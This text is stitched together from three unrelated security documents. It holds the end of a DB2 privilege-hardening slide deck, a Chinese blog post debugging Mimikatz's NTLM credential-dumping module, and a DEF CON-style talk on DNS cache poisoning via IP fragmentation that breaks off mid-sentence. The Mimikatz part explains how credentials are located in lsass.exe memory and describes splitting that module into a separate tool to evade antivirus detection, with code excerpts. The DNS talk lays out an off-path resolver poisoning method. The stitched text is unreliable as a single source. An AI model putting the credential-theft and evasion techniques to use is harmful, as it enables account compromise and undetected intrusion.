SYSCAT.SECURITYPOLICYEXEMPTIONS FROM PUBLIC db2 REVOKE SELECT ON SYSCAT.SURROGATEAUTHIDS FROM PUBLIC db2 REVOKE SELECT ON SYSCAT.ROLEAUTH FROM PUBLIC db2 REVOKE SELECT ON SYSCAT.ROLES FROM PUBLIC db2 REVOKE SELECT ON SYSCAT.SCHEMATA FROM PUBLIC db2 REVOKE SELECT ON SYSCAT.STATEMENTS FROM PUBLIC db2 REVOKE SELECT ON SYSCAT.PROCEDURES FROM PUBLIC Revoking Public Privileges III db2 revoke select on MON_DB_SUMMARY from public db2 revoke select on MON_CONNECTION_SUMMARY from public db2 revoke select on MON_WORKLOAD_SUMMARY from public db2 revoke select on MON_SERVICE_SUBCLASS_SUMMARY from public db2 revoke select on MON_CURRENT_UOW from public db2 revoke select on MON_CURRENT_SQL from public db2 revoke select on MON_PKG_CACHE_SUMMARY from public db2 revoke select on MON_LOCKWAITS from public db2 revoke select on MON_TBSP_UTILIZATION from public db2 revoke select on MON_BP_UTILIZATION from public Secure DB2 Parameter   db2 get database manager configuration   AUTHENTICATION = DATA_ENCRYPT   audit_buz_sz = 1000   discover_inst = DISABLE   Keepfenced = NO   SYSADM_GROUP = <valid group>   SYSCTRL_GROUP = <valid group>   SYSMAINT_GROUP = <valid group>   db2 get database configuration   Discover_db = DISABLE   DASADM_GROUP = <valid group>   db2 get admin configuration   AUTHENTICATION = DATA_ENCRYPT   DISCOVER = DISABLE   DASADM_GROUP = <valid group> Logon Trigger   Logon trigger are a simple way to limit who can access the database Logon Trigger Demo Thank you   Contact: Red-Database-Security GmbH Bliesstr. 16 D-.66538 Neunkirchen Germany
S-Mimikatz源码调试 前期准备 mimikatz源码:地址 调试环境: vs2019 几点设置: 1. 因为官方项目没有debug方案,所以需要手动添加debug配置 2. 项目属性配置 程序入口 调试以 privilege::debug 为例。打开调试-> mimikatz 调试属性->配置属性->调试->命令参数 wmain()是 mimikatz`的入口函数。 命令分发 从上面的循环中获取到请求参数之后就进入到命令分发的 mimikatz_dispatchCommand() 函数。 这里首先有一个 kull_m_file_fullPath 方法,然后进行匹配,暂时不知道具体作用是什么,之 后进入 mimikatz_doLocal() 方法。 命令执行 在对命令进行请求分发之后获取到 module 和 commond 两个参数,之后就进入了命令执行的阶段, 这个地方涉及到结构体的知识。 首先 mimikatz_modules[] 是一个数组,数组里面存放的是每一个模块的结构体的指针。那么第 210行就是将 module 的值和每个模块结构体中定义的 shortName 进行比较,如果相同,返回0。 结构体的结构在 kuhl_m.h 这个头文件中进行定义。 之后第213和214两行相同的方式去寻找同一个模块下存在的 command ,每个模块都预先定义一个 数组,存放全部的可执行方法的信息。 最重要的就是第215行, status = mimikatz_modules[indexModule]- >commands[indexCommand].pCommand(argc - 1, argv + 1); ,执行这个模块和命令。 mimikatz_modules[indexModule]->commands[1] 这一步相当于找到了 kuhl_m_c_privilege[] 这个数组的第一个元素,然后这个 const KUHL_M_C kuhl_m_c_privilege[] 数组,是一个结构体数组,这个第一项表示的是一个 指针函数 ,那后面 的 .pCommand(argc - 1, argv + 1) 就是去调用 kuhl_m_privilege_debug 这个函数。 可以看到的是对于 privilege::debug 这个功能,执行的函数是 kuhl_m_privilege_simple() ,而最后调用的系统API是 RtlAdjustPrivilege() 。 至此,整个简单的流程分析已经结束了,关于 mimikatz 的请求流程,和命令分发已经了解清楚 了。 S-Mimikatz_msv模块 NTSTATUS kuhl_m_privilege_simple(ULONG privId) {   ULONG previousState;   NTSTATUS status = RtlAdjustPrivilege(privId, TRUE, FALSE, &previousState);   if(NT_SUCCESS(status))      kprintf(L"Privilege \'%u\' OK\n", privId);   else PRINT_ERROR(L"RtlAdjustPrivilege (%u) %08x\n", privId, status);   return status; } 模块介绍 在 mimikatz 中 msv 模块的作用是枚举 LM 和 NTLM 凭证, KUHL_M_C 结构体中的描述是 Lists LM & NTLM credentials ,根据之前分析的命令分发过程, sekurlsa::msv 最终通过函数指针调用 函数 kuhl_m_sekurlsa_msv() 函数文件位置 kuhl_m_seckurlsa_msv1_0.c 结构体 KUHL_M_SEKURLSA_PACKAGE ,此处可以看到 ModuleName 的值设置为 lsasrv.dll ,这个 也是抓取 NTML 的重点模块。 KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_msv_package = {L"msv", kuhl_m_sekurlsa_enum_logon_callback_msv, TRUE, L"lsasrv.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}}; const PKUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_msv_single_package[] = {&kuhl_m_sekurlsa_msv_package}; NTSTATUS kuhl_m_sekurlsa_msv(int argc, wchar_t * argv[]) {   return kuhl_m_sekurlsa_getLogonData(kuhl_m_sekurlsa_msv_single_package, 1); } void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_msv(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData) {   kuhl_m_sekurlsa_msv_enum_cred(pData->cLsass, pData->pCredentials,   kuhl_m_sekurlsa_msv_enum_cred_callback_std, pData); } 结构体 _KIWI_BASIC_SECURITY_LOGON_SESSION_DATA msv 原理 参考文章 参考文章2 在上面给结构体赋值的时候可以看到 msv 模块用的的 module 是 lsasrv.dll 。而 msv 模块的原理 便是首先从 LSASS.exe 进程中计算出 lsasrv.dll 这个模块的基地址,然后在 lsasrv.dll 模块 中找到两个全局变量 LogonSessionList 和 LogonSessionListCount ,这个 LogonSessionList 中应该就保存当前活动的 Windows 登录会话列表。至于如何找这两个变量可 以看参考文章中介绍的叫《内存签名》的方法。 个人理解就是在 lsasrv.dll 这个模块中找到一个函数 LogonSessionListLock() 同时使用了 LogonSessionList 和 LogonSessionListCount 两个变量作为参数,那么只要根据这个 LogonSessionListLock() 这个函数位置,加上偏移位置,就可以获取两个全局变量的为位置。 通俗理解: LogonSessionListLock 函数的起始地址是 80065926 , LogonSessionListCount 变 量的起始地址是 80065922 , LogonSessionList 变量的起始地址 8006593D ,那经过计算 LogonSessionListCount 相对 LogonSessionListLock 的偏移是 -4 , LogonSessionList 相对 LogonSessionListLock 的偏移是 23 ,这个也正好对于 mimikatz 中的定义。那首先通过找到 LSASS.exe 进程,然后列举进程中全部的 dll 模块,计算出 lsasrv.dll 模块的基地址,然后根 据 LogonSessionListLock 函数在 lsasrv.dll 模块中的便宜了找到这个函数的位置,然后再根 据两个全局变量的相对位置,找到两个全局变量再内存中的位置。 代码调试 首先需要将程序以管理员权限进入调试模式,所以还需要进行简单的设置。 入口断点,通过命令分发进入功能模块。 kuhl_m_sekurlsa_msv() - > kuhl_m_sekurlsa_getLogonData() -> kuhl_m_sekurlsa_enum() - > kuhl_m_sekurlsa_acquireLSA() 在功能入口下断点,然后一步步进入重要的功能函数 kuhl_m_sekurlsa_acquireLSA ,调用路径 kuhl_m_sekurlsa_msv() -> kuhl_m_sekurlsa_getLogonData() - > kuhl_m_sekurlsa_enum() -> kuhl_m_sekurlsa_acquireLSA() ,接下来着重看这个 kuhl_m_sekurlsa_acquireLSA 函数,这个函数在其他的模块中也相当重要。 kuhl_m_sekurlsa_acquireLSA 函数 一路步过,最后停留在 kull_m_process_getProcessIdForName() 函数 这个函数的作用就是通过进程名去获取进程ID,调用路线 kull_m_process_getProcessIdForName() -> kull_m_process_getProcessInformation() - > kull_m_process_NtQuerySystemInformation() -> NtQuerySystemInformation() ,所以最 终调用的是 NtQuerySystemInformation 函数,这个函数是 Ntdll.dll 中的一个未公开的API方 法,调用过程有点复杂,在之后自己复现 msv 中会写到。 经过上述的调用过程,返回之后就可以根据这个 lsass.exe 进程名,找到对于的 pid 为 560 ,每 个机器这玩意都不一样,但是没关系。之后根据进程id利用 hData = OpenProcess(processRights, FALSE, pid) 函数,获取句柄。 程序继续运行 打开句柄之后,首先调用这个 kull_m_memory_open 给 &cLsass.hLsassMem 分配一块内存 ( KUHL_M_SEKURLSA_CONTEXT cLsass = {NULL, {0, 0, 0}}; ),然后对 cLsass.osContext.MajorVersion 等等三个属性赋值,这个赋值保存的是 windows 的相关信 息。 MIMIKATZ_NT_BUILD_NUMBER=19042,MIMIKATZ_NT_MINOR_VERSION=0,MIMIKATZ_NT_MAJOR_V ERSION=10 ,不同机器这个值可能产生差异。 之后进入 kull_m_process_getVeryBasicModuleInformations() ,这个函数用来获取 LSASS.exe 这个进程的基础信息,也会找到 LSASRV.dll 的基地址。 首先通过 kull_m_process_peb() 方法获取 LSASS.exe 进程的 peb 位置,实际也是调用了 NtQueryInformationProcess 函数。 在 PEB 的结构中有一个 PEB.Ldr.InMemoryOrderModuleList 的列表,这个列表记录了进程加载 的模块地址和大小,接下来就是通国遍历来查找需要的 LSASRV.dll 模块。 当查找到 lsasrv.dll 模块时,进入 callback 回调函数-> kuhl_m_sekurlsa_findlibs() 首先看看这个 lsassPackages 变量,是一个 PKUHL_M_SEKURLSA_PACKAGE 结构体,赋值如: const PKUHL_M_SEKURLSA_PACKAGE lsassPackages[] = {&kuhl_m_sekurlsa_msv_package,&kuhl_m_sekurlsa_tspkg_package,&kuhl_m_sekurlsa_w digest_package,&kuhl_m_sekurlsa_credman_package,&kuhl_m_sekurlsa_kdcsvc_package ,}; 。 而其中的 &kuhl_m_sekurlsa_msv_package 初始化的值为 KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_msv_package = {L"msv", kuhl_m_sekurlsa_enum_logon_callback_msv, TRUE, L"lsasrv.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}}; 。可以看到在这 个结构体中是定义了 mimikatz 不同模块会使用的 dll 模块,和其余一些信息。在 kuhl_m_sekurlsa_findlibs() 函数中查找到 sekurlsa::msv 功能使用的是 lsasrv.dll ,且 在 LSASS.exe 这进程中可以找到,便会将 pModuleInformation 这个结构体的信息存入 kuhl_m_sekurlsa_msv_package 这个结构体当中。 成功查找到 lsasrv.dll 模块的相关信息便返回,然后进入 kuhl_m_sekurlsa_utils_search 函 数当中,这个函数的作用就是寻找那两个全局变量了。 经过上面的查找,以及 msv 的实现原理,基本上已经完成了任务,至于之后会进入到 lsassLocalHelper->AcquireKeys(&cLsass, &lsassPackages[0]->Module.Informations) 函 数,感觉是用于计算加解密之类的,具体功能没有太理解。最后一步就是处理两个全局变量获取活 动凭据信息,然后打印了。 像 mimikatz 这种神作肯定还是要自己调试才能领悟其中一些精妙的地方,自己调试的时候便只有 一句话,作者NB。即便调试了很多次,调试了很久,弄清了一个大概的流程,但是其中还有很多 神奇的地方没有完全领会,而上述的内容可能也存在一些错误,欢迎指出。 粗糙的将MSV 功能分离 在考虑到对 mimikatz 进行免杀的时候,由于 mimikatz 功能较多,整体免杀的效果并不会很好, 所以在考虑将常用的功能抽离出来,然后对这些功能进行分开免杀,这样的话效果可能会更好一 些。在上述理解了 msv 的基本原理之后,动手将 msv 粗糙的抽离出来,忽略了亿点点细节,复用 了亿点点代码。效果如下。代码地址:Ghost2097221-selfMimikatz 几个踩坑 1. NtQueryInformationProcess 的加载方式 2. RtlGetNtVersionNumbers 的加载方式 switch (memory->type) { case KULL_M_MEMORY_TYPE_PROCESS: HMODULE hModule = LoadLibraryA("Ntdll.dll");//需要通过LoadLibraryA的方式引入 dll,然后加载相关函数。 PFUN_NtQueryInformationProcess pfun = (PFUN_NtQueryInformationProcess)GetProcAddress(hModule, "NtQueryInformationProcess"); NTSTATUS a = pfun(hProcess, info, buffer, szBuffer, &szInfos); if ((szInfos == szBuffer) && processInformations.PebBaseAddress) { aProcess.address = processInformations.PebBaseAddress; status = kull_m_memory_copy(&aBuffer, &aProcess, szPeb); } break; } void GetSysInfo() { //DWORD* MIMIKATZ_NT_MAJOR_VERSION, DWORD* MIMIKATZ_NT_MINOR_VERSION, DWORD* MIMIKATZ_NT_BUILD_NUMBER    //获取系统信息    HMODULE hDll = ::LoadLibrary("ntdll.dll");    typedef void (WINAPI* getver)(DWORD*, DWORD*, DWORD*);    getver RtlGetNtVersionNumbers = (getver)GetProcAddress(hDll, "RtlGetNtVersionNumbers");    RtlGetNtVersionNumbers(&MIMIKATZ_NT_MAJOR_VERSION, &MIMIKATZ_NT_MINOR_VERSION, &MIMIKATZ_NT_BUILD_NUMBER); MIMIKATZ_NT_BUILD_NUMBER &= 0x00007fff; } 3. mimikatz 中大量的使用了结构体,而且还覆写了很对系统定义的结构体,加入自己定义的属性。 所在进行抽离的时候有些结构体会出现属性不存在的情况,这种就是作者进行了覆写。
"FIRST-TRY" DNS CACHE POISONING WITH IPV4 AND IPV6 FRAGMENTATION Or how to become the one in “one in 34 million” WHERE WE’RE GOING 1. Intro 2. Background on DNS 3. Fragmentation Attacks 4. IPID Inference 5. The Attack (agnostic to IPv4 and IPv6) 6. Mitigations © 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public $ whoami Travis (Travco) Palmer § Security Research Engineer for Cisco Systems § Offensive Security Certified Professional & Expert (OSCP & OSCE) § Not a DNS/DNSSEC expert Brian Somers § Principal Engineer for Cisco Systems § FreeBSD & OpenBSD developer alumnus YOU DID WHAT? Found a way to poison the cache of DNS resolvers without man-in-the-middle more consistently Modified an IPv4 attack on DNS over UDP, reduced it from hundreds of iterations to plausibly one Extended the attack so that it bypasses all current recommendations YES, WE DID DISCLOSE RESPONSIBLY Our team discovered this attack during a focused “pentest” engagement Our team disclosed to Cisco Umbrella Umbrella has been disclosing this to other DNS operators (ongoing) before DEF CON. 1. Intro 2. Background on DNS 3. Fragmentation Attacks 4. IPID Inference 5. The Attack (agnostic to IPv4 and IPv6) 6. Mitigations WHERE WE’RE GOING If the timing on a particular DNS request can be predicted, the reply only needs to be well structured and have a valid ID In 2008 Dan Kaminsky demonstrated 16bits of entropy is not sufficient to prevent cache poisoning And can be performed off-path (source ports are predictable) QUICK AND DIRTY DNS PRIMER D. Kaminsky. It’s The End Of The Cache As We Know It. In Black Hat conference, 2008. http://www.doxpara.com/DMK_BO2K8.ppt IDEAL POISONING SCENARIO TARGET PUPPET INTERNET CACHE ATTACKER IDEAL POISONING SCENARIO TARGET INTERNET Resolver is v.x.y.z ! CACHE PUPPET ATTACKER IDEAL POISONING SCENARIO TARGET INTERNET CACHE PUPPET ATTACKER DNS ID = 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011, etc… IDEAL POISONING SCENARIO TARGET INTERNET CACHE Not Poisoned? Try, try again (just make sure it isn’t cached) PUPPET ATTACKER DNS ID = 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011, etc… IDEAL POISONING SCENARIO TARGET INTERNET CACHE PUPPET ATTACKER DNS ID = 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011, etc… IDEAL POISONING SCENARIO TARGET INTERNET CACHE PUPPET ATTACKER IDEAL POISONING SCENARIO INTERNET CACHE TARGET PUPPET ATTACKER IDEAL POISONING SCENARIO INTERNET CACHE TARGET PUPPET ATTACKER DNS source ports aren’t predictable anymore. To fake a DNS response off-path, a 16bit DNS identifier, and a UDP port number (16bit*) need to be guessed. QUICK AND DIRTY DNS PRIMER “.org” TLD .defcon.org A www.defcon.org ICANN “.” Enter DNS Security Extensions (DNSSEC) Cryptographic key-based signing of DNS zones by parent zones, and signing of records by zones. QUICK AND DIRTY DNS PRIMER Enter DNS Security Extensions (DNSSEC) QUICK AND DIRTY DNS PRIMER https://www.cloudflare.com/dns/dnssec/how-dnssec-works/ Data origin authentication - verify that the data it received actually came from the zone it should have come from. Data integrity - data cannot be modified in transit since records are signed by the zone owner with the zone's private key. DNSSEC adds (most importantly) : QUICK AND DIRTY DNS PRIMER QUICK AND DIRTY DNS PRIMER https://www.icann.org/news/announcement-2019-02-22-en QUICK AND DIRTY DNS PRIMER https://www.internetsociety.org/resources/doc/2016/state-of- dnssec-deployment-2016/ Sign Delegation NS and A resource records (RRs) Sign Glue Records DNSSEC doesn’t: Origin of work: “Fragmentation Considered Poisonous”, Amir Herzberg and Haya Shulman, Published 2012 .com example.com QUICK AND DIRTY DNS PRIMER QUICK AND DIRTY DNS PRIMER Sign Delegation NS and A resource records (RRs) Sign Glue Records DNSSEC doesn’t: Origin of work: “Fragmentation Considered Poisonous”, Amir Herzberg and Haya Shulman, Published 2012 .com example.com Signing comes at a cost, especially with NSEC3 Origin of work: “Fragmentation Considered Poisonous”, Amir Herzberg and Haya Shulman, Published 2012 $ dig +dnssec @dns- 2.datamerica.com. gggg.defcon.org QUICK AND DIRTY DNS PRIMER Origin of work: “Fragmentation Considered Poisonous”, Amir Herzberg and Haya Shulman, Published 2012 dig +dnssec @dns-2.datamerica.com. gggg.defcon.org; <<>> DiG 9.11.2-P1-1-Debian <<>> +dnssec @dns-2.datamerica.com. gggg.defcon.org; (2 servers found);; global options: +cmd;; Got answer:;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 49427;; flags: qr aa rd; QUERY: 1, ANSWER: 0, AUTHORITY: 6, ADDITIONAL: 1;; WARNING: recursion requested but not available;; OPT PSEUDOSECTION:; EDNS: version: 0, flags: do; udp: 4096; COOKIE: 7f011ea810942e94c127df285cfd54a55323c46351aa65c0 (good);; QUESTION SECTION:;gggg.defcon.org. IN A;; AUTHORITY SECTION:defcon.org. 86400 IN SOA dns- 1.datamerica.com. hostmaster.defcon.org. 2019042612 43200 600 2419200 86400defcon.org. 86400 IN RRSIG SOA 10 2 2419200 20190910161941 20190609151941 14006 defcon.org. HeG6b/gBOIsP4lMsC7/N7neFp/OQQV5VcKWycbnLe88wwT2wPTxx0Rsm mx9By1mGJv0TJhh/F4gFz7Vgh7lB1gPmGgkjfaHP42U3EyvdtyIYDIn6 xfa2l9Ev4vNB3NrFwR9vzsnRbi0OZjBKEsK6gpB4caiEAyVpXkgp61NU QpW0NKojLAo7PECRmjpdKiu1VthY9wMUjz4b9phXQUBQtCxq7EhheuZf JXQixGyGTlxeel3DO0hWo465YyBhyM8cd4qh2xNRiGbLdkzrNx+QI7uG 41eyJqDlRZK8hUmacyCI7J4+2F6MTEUDsTfYzVJnq5IAJZG1n4ByUjPe fq/M4nZ3dmRMSV2HlSARYqaMcYuVsRRQUSG8mEP1sV2ByPIwXMRnxDnc QuxmS6p+ML7yQnc2azpWtQHoYer+F0bwylkrW+5Qtivn4otIngtsoM94 az+Dqxrue6YeK6BgMgGkXz1S3Wa8ld1v/z7o7DQGAXt36a6xM4CEbyWX ER+20zmXE40DKXwR0mByixzrLp9o6c/NhdsG7fIy9bKGzOYcpkbv8mf4 qvcd9gKXA7BlIvk4Cf+RlpGTB4arjhASXP0RuZVu8yAD+8MZGE4Ri6/o U6v96xW5Ave2ck3C5W/gkxhn6+J9mB2gMCEKyLsOV5OUIhVhaQbZqymD Krg5dZTnlok=defcon.org. 86400 IN NSEC _dmarc.defcon.org. A NS SOA MX TXT AAAA RRSIG NSEC DNSKEY CAA TYPE65534defcon.org. 86400 IN RRSIG NSEC 10 2 86400 20190909090129 20190608080148 14006 defcon.org. Sk/QKHMfW9u/oVEBoqL9T+KUVs00UMkmij71zS0KNZ6QOFFbwvdnpStc KD0JfQ6u4mczLXC3PfgOPlH11/YGLf9IRJ0x2CHYMg6UpYMw06Ox3MNm h1Mm2IT3TqCMrMCAUjAwO5jhBB6aOmYRlwIr3yv8x8YW/gFS/C61BKp0 uKXYUdR8sYlEZ9b8BDvyxAWbRN8N5jr72KSR5xpBwzt2TygAD3y6F4fr qyj2bZuZ4KFh+toTPwbXlFb3OvF8qcOhz+IpgO3zVkFbtCIc3tbHCknI uRf53X6dQ5vhy6eYstai4IhSx7TTGD/Lq1NoEpxKx8VS0gQyw0OSb8tj tAt4/x9qt98MYr++OsbYCt1lehv2sq7HL93s5RTnDs0ENDd19do/LqU4 S6toMxnCoKksmh2g5z5zHuzhiPWsH+OzD4SC4v4ji7R7tdvMXRQ9L9hs kkBsQERCD+AbYQ7usXYecnmkobWapJJkd1+5w3wsNQyqi1uMAhJmz2mm Wz0dVTv844lB1CG3htcmYViWKWmRRL/mRPKb2cmEgTmKXG5ZONvjkOUa 9Z0pYJTzIPhRENq3Nel9gEhz3auuf697TFJr5x/Jux1hNtoHvko4gKaH 0t1UYkANH25n6W/m6tHcWtMliuqu7YC97E6FBB6dzXRFB/TsAU5qFnz2 5R0gePsKvOw=forums.defcon.org. 86400 IN NSEC info.defcon.org. CNAME RRSIG NSECforums.defcon.org. 86400 IN RRSIG NSEC 10 3 86400 20190909232755 20190608224446 14006 defcon.org. JfXq564r6ge6qiZDvlUPQJBL+ks0UbQ/QuwbDj4+sbYOGO2HAePYNIxX g1EjC80FRAXKrYBb735iNdKS3OLcaepEnSQyps3TcVZrJ92k6ZrFGr2p lxOoX93CpYHgipkmR2vBVhuYqjXjXG/P1sNYymIhU+nZfMv13t5KjsPy NmC1tNIGnFa9tSwiIzD26GtHnqFfV0i4tPDvIz3lLfMt4i8tUalKL3i/ LiPhKoQvVNC/vTMg8CWiJIcBRe/3H25lT1lQDnvGXb2otrdrTX8KVK19 T5diMVES1KjOUosxXc9lcYRZ0esAOxCDqygtIkd0mRLot8ipln1FPIo3 GUWtMUFZd4Ht3mIK9OfZljRBsFfS6rLxAU+vBk0Li68c+CX1qyDKYCRU Qf0m6Zerj2zcg2pwhb/H7OeucUnJXHEdtrsBbZIJzlHQ/WyOadVqT0ry RWjALawT0CXIIPVURnDpEVhv89LtSexnu+ysBUZFsVy0aMcj7WSONNWE 6bW7mcKWyAJ3M8/Nfao7WIJaJM76RmgBJ8mzJKnkQFs/WIkj4umQrlY1 HgZbunn0EyoBa0MozA9U/D/q4WvFnOAEZ3jTlYpOi1/cJaM+0RWB/YNZ Dkbnqp54wdfy4TFG21z0lSfpHzNzf8g/xOxeB1RQJ8cqaCb1HrDuY0VH Q4C7XGn+4dU=;; Query time: 85 msec;; SERVER:;; WHEN: Sun Jun 09 14:49:09 EDT 2019;; MSG SIZE rcvd: 1922 $ dig +dnssec @dns- 2.datamerica.com. gggg.defcon.org … MSG SIZE rcvd: 1922 Signing comes at a cost, especially with NSEC3 QUICK AND DIRTY DNS PRIMER WHERE WE’RE GOING 1. Intro 2. Background on DNS 3. Fragmentation Attacks 4. IPID Inference 5. The Attack (agnostic to IPv4 and IPv6) 6. Mitigations WHY DNS FRAGMENTATION OVER THE O.G. KAMINSKY? If a response becomes too big, it needs to be fragmented at the IP layer. The DNS identifier and UDP port number are early in the IP payload. For the second fragment, the only entropy is the IP identifier (IPID) in the header. Origin of work: “Fragmentation Considered Poisonous”, Amir Herzberg and Haya Shulman, Published 2012 The IP identifier (IPID) for IPv4 is 16bits A significant portion of nameservers were found to have a single global counter for IPID Origin of work: “Fragmentation Considered Poisonous”, Amir Herzberg and Haya Shulman, Published 2012 WHY DNS FRAGMENTATION OVER THE O.G. KAMINSKY? IDEAL POISONING SCENARIO TARGET INTERNET IPID=5002 CACHE 0 PUPPET ATTACKER IDEAL POISONING SCENARIO TARGET PUPPET INTERNET CACHE 0 ATTACKER IDEAL POISONING SCENARIO TARGET INTERNET IPID = 5003, 5004, 5005, 5006, 5007, 5008, 5009, 5010, 5011, etc… 64 CACHE We might need to repeat this (Patience/Avoiding Cache) PUPPET ATTACKER IDEAL POISONING SCENARIO TARGET INTERNET 63 CACHE IPID = 5003, 5004, 5005, 5006, 5007, 5008, 5009, 5010, 5011, etc… PUPPET ATTACKER IDEAL POISONING SCENARIO TARGET INTERNET 63 CACHE IPID = 5003, 5004, 5005, 5006, 5007, 5008, 5009, 5010, 5011, etc… PUPPET ATTACKER IDEAL POISONING SCENARIO TARGET INTERNET CACHE 0 PUPPET ATTACKER IDEAL POISONING SCENARIO INTERNET CACHE 0 TARGET PUPPET ATTACKER IDEAL POISONING SCENARIO INTERNET CACHE 0 TARGET PUPPET ATTACKER DNSSEC Adds lots of signature records, but the authority (NS) and additional sections are always last Subdomain Injection, NS Hijacking, NS Blocking Origin of work: “Fragmentation Considered Poisonous”, Amir Herzberg and Haya Shulman, Published 2012 POISONOUS FRAGMENTATION DNSSEC Adds lots of signature records, but the authority (NS) and additional records are last Subdomain Injection, NS Hijacking, NS Blocking Origin of work: “Fragmentation Considered Poisonous”, Amir Herzberg and Haya Shulman, Published 2012 POISONOUS FRAGMENTATION MALICIOUSLY FORCING FRAGMENTATION TARGET INTERNET ATTACKER IPID = 5002, 5003, 5004, 5005, 5006, 5007, 5008, 5009, 5010, 5011 5012 64 CACHE PUPPET A decreasing number of deployed nameservers/OSs should be using sequential and global counters We can’t re-query things that get cached With IPv6, the IPID in the fragmentation extension header is 32bits, with a cache of 64 fragments: Realistic average ~34 million iterations Unrealistic ideal average ~17 million iterations Origin of work: “Fragmentation Considered Poisonous”, Amir Herzberg and Haya Shulman, Published 2012 PERTINENT LIMITATIONS Prior to our engagement with Umbrella (April 2019), their implementation used IPv6 whenever possible, detected IPv4 fragments, and re-queried over TCP Workshop presentation at OARC 30 (Mid-May 2019)… There has been some notice PERTINENT LIMITATIONS Excerpt of slide from: https://indico.dns-oarc.net/event/31/contributions/692/attachments/660/1115/fujiwara-5.pdf, Given Mid-May 2019 … but the presentation wasn’t us… PERTINENT LIMITATIONS WHERE WE’RE GOING 1. Intro 2. Background on DNS 3. Fragmentation Attacks 4. IPID Inference 5. The Attack (agnostic to IPv4 and IPv6) 6. Mitigations “Counting Packets Sent Between Arbitrary Internet Hosts”, Jeffrey Knockel and Jedidiah R. Crandall, 2014 OPTIMIZED LINUX KERNELS AND POPCORN There is a storied history of using IPID for Idle Scanning OPTIMIZED LINUX KERNELS AND POPCORN A patch that adds perturbation (2014) A patch that replaces per-destination IPID counters with “binned” counters (2014) Two relevant changes to Linux Kernel: Origin of work: “ONIS: Inferring TCP/IP-based Trust Relationships Completely Off-Path”, Zhang, Knockel, and Crandall. Published 2018 OPTIMIZED LINUX KERNELS AND POPCORN A patch that adds perturbation Origin of work: “ONIS: Inferring TCP/IP-based Trust Relationships Completely Off-Path”, Zhang, Knockel, and Crandall. Published 2018 https://git.kernel.org/pub/scm/linux/kernel/ git/stable/linux.git/commit/?id=73f156a6e8 When sending a packet, increments IPID by a normal distribution between 1 and the kernel ticks elapsed OPTIMIZED LINUX KERNELS AND POPCORN A patch that replaces per-destination IPID counters with “binned” counters Origin of work: “ONIS: Inferring TCP/IP-based Trust Relationships Completely Off-Path”, Zhang, Knockel, and Crandall. Published 2018 https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=04ca6973f7 ip.dst: 5810 2058 1050 9714 4382 8620 4 4299 3462 HASH OPTIMIZED LINUX KERNELS AND POPCORN One of 2048 “bins” (IP_IDENTS_SZ default) Origin of work: “ONIS: Inferring TCP/IP-based Trust Relationships Completely Off-Path”, Zhang, Knockel, and Crandall. Published 2018 https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=04ca6973f7 A patch that replaces per-destination IPID counters with “binned” counters OPTIMIZED LINUX KERNELS AND POPCORN Use the IP-space of IPv6 for source addresses Find hash collisions between destination addresses by seeing the increment from zombie to target Get ”under” perturbations (for most systems this timing is ~10ms but may be as low as ~0.66ms) MADE ONIS (2018) MISSED ONUS ONIS: ONIS is Not an Idle Scan Origin of work: “ONIS: Inferring TCP/IP-based Trust Relationships Completely Off-Path”, Zhang, Knockel, and Crandall. Published 2018 Once a collision is found, start using the “zombie” for Not an Idle Scan But wait… wasn’t the only things preventing DNS Fragment Poisoning the difficulty of guessing the IPID? ONIS: ONIS is Not an Idle Scan Origin of work: “ONIS: Inferring TCP/IP-based Trust Relationships Completely Off-Path”, Zhang, Knockel, and Crandall. Published 2018 MADE ONIS (2018) MISSED ONUS WHERE WE’RE GOING 1. Intro 2. Background on DNS 3. Fragmentation Attacks 4. IPID Inference 5. The Attack (agnostic to IPv4 and IPv6) 6. Mitigations Much like with ONIS, start by finding collisions But wait… didn’t you say something about IPv6 being used? This additive work is ours, diagram edited from: “ONIS: Inferring TCP/IP-based Trust Relationships Completely Off-Path”, Zhang, Knockel, and Crandall. Published 2018 FINDING COLLISIONS OFF-PATH Works for IPv6 when fragmented What about getting address space? This additive work is ours, diagram edited from: “ONIS: Inferring TCP/IP-based Trust Relationships Completely Off-Path”, Zhang, Knockel, and Crandall. Published 2018 IPv6 Echo Reply FINDING COLLISIONS OFF-PATH What about getting address space? All AWS Virtual Private Clouds (including free tier) What about getting address space? All AWS Virtual Private Clouds (including free tier) can add a /64 IPv6 CIDR (18,446,744,073,709,551,616 hosts) Wait, why is this better than finding global IPID nameservers? Broader selection, all ‘recent’ Linux kernels (>3.16 – Aug 3 2014) Binning acts in our favor, ~99.95% of other hosts will not change the IPID (2047/2048) AFTER A COLLISION IS FOUND Exploit Necromancy, Fragmentation is still poisonous Being a downstream puppet is trivial for public resolvers … and organizations and individuals are increasingly relying on them. AFTER A COLLISION IS FOUND Nameserver uptime is in the attacker's favor The secret key for hashing destination addresses only changes at reboot – so… ∞ uptime on nameservers? Wait for times of least monitoring Accumulate collisions (matches) for multiple nameservers and resolvers Perform multiple short-duration cache attacks (for cases where we can specify timeout) WarGames and Waiting Games AFTER A COLLISION IS FOUND If this is doable in a single hit: Maybe don’t need a downstream puppet Anticipate automated clients (e.g. cron-jobs) does your blueteam work midnights? Maybe the puppet can be passive Attempt to poison common requests when they go out of cache Maybe poison isn’t the purpose Use NS Blocking to kill communication to all nameservers Unrealistic blind attacks are now plausible "in one shot" NS Blocking work: “Fragmentation Considered Poisonous”, Amir Herzberg and Haya Shulman, Published 2012 AFTER A COLLISION IS FOUND WHERE WE’RE GOING 1. Intro 2. Background on DNS 3. Fragmentation Attacks 4. IPID Inference 5. The Attack (agnostic to IPv4 and IPv6) 6. Mitigations What Umbrella was going to deploy for IPv4 Handle fragments in pre-assembly Content in later UDP fragment should be untrusted Trigger re-queries at a higher layer over TCP Issue: IPv6 headers IPv6 extension headers might not exist, may 